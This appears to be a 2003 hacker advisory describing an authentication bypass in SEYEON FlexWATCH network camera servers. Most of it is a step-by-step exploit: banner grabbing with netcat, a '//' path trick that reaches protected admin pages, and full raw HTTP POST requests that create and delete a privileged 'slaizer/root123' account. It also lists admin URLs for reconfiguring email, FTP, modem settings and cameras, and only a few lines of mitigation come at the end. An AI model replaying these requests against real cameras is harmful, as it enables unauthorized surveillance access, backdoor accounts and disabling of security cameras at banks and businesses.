FlexWATCH.txt

`  
  
------------------ u0xa ------------------------  
Author: SLAIZER   
mail: slaizer[at]phreaker.net  
  
Date: Sun/Oct/26/2003   
  
-------"Another way of seeing the things"--------  
  
-------------------------------------------------  
  
  
  
  
Unauthorized access Vulnerability in FlexWATCH camera Server.  
-----------------------------------------------------------  
  
Vendor:  
-------  
  
·SEYEON Technology  
·FlexWATCH Network Video Server   
Url: http://www.flexwatch.com/  
Mail: [email protected]   
  
  
Product:  
--------  
  
All versions web based configuration utility.  
I tested on SYS_MODEL = 132  
  
FlexWATCH is a Camera Server entrusted to centralize for Web Administration .  
It´s very frequently used by safety companies , banks , parks and comercial centres.  
  
  
  
  
Description :  
-------------  
  
[Necora@eviluser]$ echo -e "HEAD / HTTP/1.0\n\n" | nc victim 80  
  
HTTP/1.0 302 Redirect  
Server: FlexWATCH-Webs <--- :)  
Date: Sun Oct 26 02:15:07 2003  
Pragma: no-cache  
Cache-Control: no-cache  
Content-Type: text/html  
Location: http://victim/index.htm  
Age: 0  
  
  
  
  
*First:  
  
  
For default , you can read the source at index page and see that :  
  
<!-- You can modify here for user information. -->  
<!-- ex) ID:guest, PASSWORD:guest -->  
  
Many System Use this user and password , but that isn´t important .  
  
  
  
  
  
I found that :  
  
------------u0xa-----------  
  
}  
function adminTool(){ window.open("admin/aindex.htm","aindex","width=790,height=430,status=yes,resizable"); }  
  
function select_sample()  
  
  
------------u0xa-----------  
  
  
<This is a autentification-javascript>  
  
Url: admin/aindex.htm is a web based configuration .  
  
  
  
  
  
  
*I read more source pages , and see :  
  
  
-----------u0xa------------  
  
  
  
<APPLET mayscript width=352 height=260 archive="stream.jar" codebase='/app/applet' code=StreamApplet.class name=StreamApplet>  
  
  
  
-----------u0xa------------  
  
  
ummMm I want read stream.jar :  
  
  
  
[Necora@eviluser]$ jar xf stream.jar   
-  
META-INF/  
META-INF/MANIFEST.MF  
PrintfFormat$ConversionSpecification.class  
CMsg.class  
FInfo.class  
StreamApplet.class  
ImgCan.class  
IMsg.class  
JHCompr.class  
JHEncry.class  
JHManda.class  
JHStand.class  
LoginDlg.class <---- (C:  
MIMEBase64.class <--- old friend :)  
CgiQueryInfo.class  
PrintfFormat.class  
QueryMng.class  
Semaphore.class  
SingleCgi.class <----- For now any cgi-url  
StrCan.class  
StreamCgi.class <----- For now any cgi-url  
StreamSocket.class  
StreamThread.class  
TCBack.class  
Timer.class  
-  
  
·It´s enough to know how the system works , authoritation , cgi , crypt..  
  
  
  
---------------------------  
  
  
  
  
*Second seen http://victim/live.html  
  
and find that :  
  
  
------------u0xa------------  
  
  
<script language = "JavaScript" src="sysinfo.js"></script>  
  
  
------------u0xa------------  
  
  
  
  
This contain info from the System :  
  
//-- Model Information  
SYS_MODEL = 132;  
KERNEL_MAJORVER = 2;  
KERNEL_MINORVER = 2;  
IS_OEM = 0;  
MODEL_NAME = "FLEXWATCH";  
  
//-- For Administration  
IS_ISDN = 0;  
IS_LEASED = 1;  
IS_AUDIO = 1;  
IS_RTC = 1;  
IS_RTC = "SAMSUNG";  
  
//-- For Application  
COUNT_CAM = 6;  
COUNT_DI = 6;  
COUNT_DO = 6;  
VIDEO_FORMAT = 2;  
TOTAL_FORMAT = 0x0007;  
IS_PTZ = 1;  
  
var CAM_NAME = new Array (6);  
CAM_NAME[1] = "Office1";  
CAM_NAME[2] = "Office2";  
CAM_NAME[3] = "Office3";  
CAM_NAME[4] = "4";  
CAM_NAME[5] = "5";  
CAM_NAME[6] = "6";  
  
var PTZ_INSTALL = new Array (6);  
PTZ_INSTALL[1] = 51;  
PTZ_INSTALL[2] = 51;  
PTZ_INSTALL[3] = 0;  
PTZ_INSTALL[4] = 51;  
PTZ_INSTALL[5] = 0;  
PTZ_INSTALL[6] = 0;  
  
-----------------------  
  
  
  
  
  
  
*Some time ago , i read a Security Vulnerability in Boa , how can obtain access in privileged directory with '//'  
  
Example :  
  
  
http://victim//privileged.html <--- ok?  
  
  
  
  
  
*The Access camera url :  
------------------------  
  
  
http://victim//app/sample/ab1.html   
  
  
  
Wow! first access granted ! , now you have got identify in java-application .  
But... why to search more there? if we can play with administration´s site o web, let´s try  
  
  
  
  
http://victim//admin/aindex.htm <---- Interesting....   
  
  
  
  
  
Now it´s very easy :D ,   
  
  
·Add a User for view cameras :  
------------------------------  
  
  
http://victim//admin/asp/adduser.asp <---- Form <form action=/goform/AddUser method=POST>  
  
  
[Necora@eviluser]$ nc victim 80  
  
  
POST /goform/AddUser HTTP/1.0  
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*  
Referer: http://victim//admin/asp/adduser.asp  
Accept-Language: es  
Content-Type: application/x-www-form-urlencoded  
Connection: Close  
User-Agent: Epi and Blass 1.0 (compatible; Cuartango 3.0)  
Host: victim  
Content-Length: 152  
Pragma: no-cache  
  
RetPage=%2Fadmin%2Fretok2.htm&SaveCfg=YES&ClsPage=%2Fadmin%2Fclose1.htm&user=slaizer&password=root123&passconf=root123&group=POWER_USER&enabled=on&ok=OK  
  
\n\n  
  
  
  
**********************************************************************  
-Wow! New user add : user= slaizer password= root123 group=POWER_USER*  
**********************************************************************  
*Note : Exist diferent Groups for add user : guest , User and Power_User .  
At default only guest group can access remotely , you change this in :  
  
http://victim//admin/asp/chglimit.asp  
  
  
  
  
  
  
·How to delete user :  
------------------  
  
http://victim//admin/asp/deluser.asp  
  
  
[Necora@eviluser]$nc victim 80  
  
POST /goform/DeleteUser HTTP/1.0  
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*  
Referer: http://victim//admin/asp/deluser.asp  
Accept-Language: es  
Content-Type: application/x-www-form-urlencoded  
Connection: Close  
User-Agent: Epi and Blass 1.0 (compatible; Cuartango 3.0)  
Host: victim  
Content-Length: 90  
Pragma: no-cache  
  
  
  
RetPage=%2Fadmin%2Fretok2.htm&SaveCfg=YES&ClsPage=%2Fadmin%2Fclose1.htm&user=slaizer&ok=OK  
  
\n\n  
  
  
  
**********************  
-User slaizer deleted*  
**********************  
  
  
------------------------------------------------|  
Now you have access to watch all cameras :-D ! |  
Too you can reboot , edit configuration ... |  
|  
|  
http://victim/app/sample/ab1.html |   
|  
-Login=slaizer password=root123- |   
________________________________________________|  
  
  
  
Examples :  
  
  
·Configure e-mail adrees for send config :  
  
http://victim//admin/fset/fset_email.htm  
  
  
  
·Configure FTP for send a "evil-config" troyan-cgi/asp conf .. blah blah.  
  
http://victim//admin/fset/fset_ftp.htm  
  
  
  
·Edit modem configuration for phreakers :)  
  
http://victim//admin/fset/fset_modem.htm  
  
  
  
·CHange Camera Names xD Camera1=xD Camera2=rules! Camera3=AznarSucks!  
  
http://victim//admin/aindex.htm  
  
  
  
<Imagination , coffee and time.>  
  
  
  
  
  
  
Possible solutions :  
--------------------  
  
  
·Activate the firewall to admit alone connections since the client that we want.  
  
·Not to trust in the autentificacion on part of the client ( javascripts..)  
  
·SEYEON invest in the safety ... a thief might use it to deactivate the cameras in a theft ...   
  
  
  
  
************************  
Greetz! :  
  
:: gyorgyo :: overpower :: IsAhT :: phiber :: IaM :: zapper :: dreyer :: kanutron :: Makensi   
  
:: TaYoKeN :: plAnadeCu :: AzTaGo :: gordenai ::  
  
  
For aLL :   
#boinasnegras #ngsec #drakulines #rmosc \\ Irc-Hispano \\  
  
************************  
  
*******************************  
*Sorry for orthographic errors*  
*******************************  
  
  
  
  
  
  
  
  
  
  
  
  
  
`